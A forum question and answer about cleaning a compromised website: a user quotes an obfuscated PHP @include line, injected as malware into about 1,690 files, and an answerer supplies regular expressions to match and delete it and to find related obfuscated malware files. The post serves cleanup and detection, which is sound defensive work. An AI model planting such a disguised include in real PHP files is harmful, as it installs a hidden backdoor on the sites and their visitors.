I try to find a way to find and replace using EMEditor and a Regular Expression. I try to applu this for the item below:
<?php /*f04b8*/ @include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o"; /*f04b8*/ // ini_set(?display_errors?, 1);I try to replace / erase the code between
<?phpand
// ini_set(?display_errors?, 1);everything in between is this maleware scipt that I try to get out from many files.
I look for a easy way to delete this in 1690 files.
Any idea would be very helpfull.Best wishes,
Thomas
Answer
The PHP RegExpression for any similar strings would be…
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
This can be further simplified but works as is
**Note this will find all occurrences of the offending strings starting with a comment block containing 5 random characters that are not newlines, followed by two new lines, the @include line, 2 more new lines, and the matching block comment closure – regardless of if the document was saved on windows, mac, or linux machines – note \r\n (windows machines) and \n\n (linux & mac machines)
I’ve verified your string matches at the regex at:
https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
Quick Heads-up, to find the malware files containing random string names that contain the obfuscated functions… use the following regex…
/function...\(\$..\){\$...\=."/
This should track down the altered files and find any additional malware files of the same for the malware you’re being affected by..
Have a great day! Hopefully this is still useful to someone.
Attribution
Source : Link , Question Author : Thom , Answer Author : Davidw
